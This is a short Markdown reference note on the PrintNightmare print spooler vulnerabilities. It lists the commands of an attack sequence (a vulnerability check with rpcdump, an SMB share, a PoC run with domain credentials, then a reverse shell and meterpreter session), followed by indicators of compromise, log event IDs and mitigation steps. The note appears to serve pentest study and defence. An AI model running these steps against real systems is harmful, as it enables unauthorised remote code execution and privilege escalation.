48 lines
1.5 KiB
Markdown
48 lines
1.5 KiB
Markdown
|
# Print Nightmare
|
||
|
|
||
|
* Privilege Escalation using Print Spooler Service
|
||
|
* Located at `C:\Windows\System32\spoolsv.exe`
|
||
|
* Enabled by default
|
||
|
* [CVE-2021-1675](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675) (locally exploitable) and [CVE-2021-34527](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527) (RCE) are both related to the print spooler
|
||
|
* RCE connection is done via [DCE/RPC](https://wiki.wireshark.org/DCE/RPC). Use of `RpcAddPrinterDriver` or `RpcAddPrinterDriverEx`
|
||
|
|
||
|
## Usage
|
||
|
|
||
|
* Prepare reverse shell
|
||
|
* Check if target would be vulnerable
|
||
|
```sh
|
||
|
rpcdump.py @$TARGET_IP | grep -e 'MS-RPRN|MS-PAR'
|
||
|
```
|
||
|
* Execute smb server
|
||
|
```sh
|
||
|
smbserver.py share . -smb2support
|
||
|
```
|
||
|
* Execute PoC with credentials to elevate
|
||
|
```sh
|
||
|
python CVE-2021-1675.py <domain of domaincontroller>/<user>:<password>@$TARGET_IP
|
||
|
```
|
||
|
* Use the meterpreter session
|
||
|
|
||
|
## IOCs
|
||
|
|
||
|
* `pcAddPrinterDriverEx()` is called
|
||
|
* [Sygnia](https://www.sygnia.co/demystifying-the-printnightmare-vulnerability) explains them
|
||
|
* [Splunk queries](https://www.splunk.com/en_us/blog/security/i-pity-the-spool-detecting-printnightmare-cve-2021-34527.html)
|
||
|
|
||
|
* Logs are `Microsoft-Windows-PrintService/Admin` and `Microsoft-Windows-PrintService/Operational`
|
||
|
* Event Ids `316, 808, 811, 31017, 7031`
|
||
|
|
||
|
## Mitigation
|
||
|
|
||
|
* [link](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527)
|
||
|
* Stop and disable
|
||
|
```sh
|
||
|
Stop-Service -Name Spooler -Force
|
||
|
Set-Service -Name Spooler -StartupType Disabled
|
||
|
```
|
||
|
* Disable group policy
|
||
|
```sh
|
||
|
Computer Configuration/Administrative Templates/Printers
|
||
|
```
|
||
|
|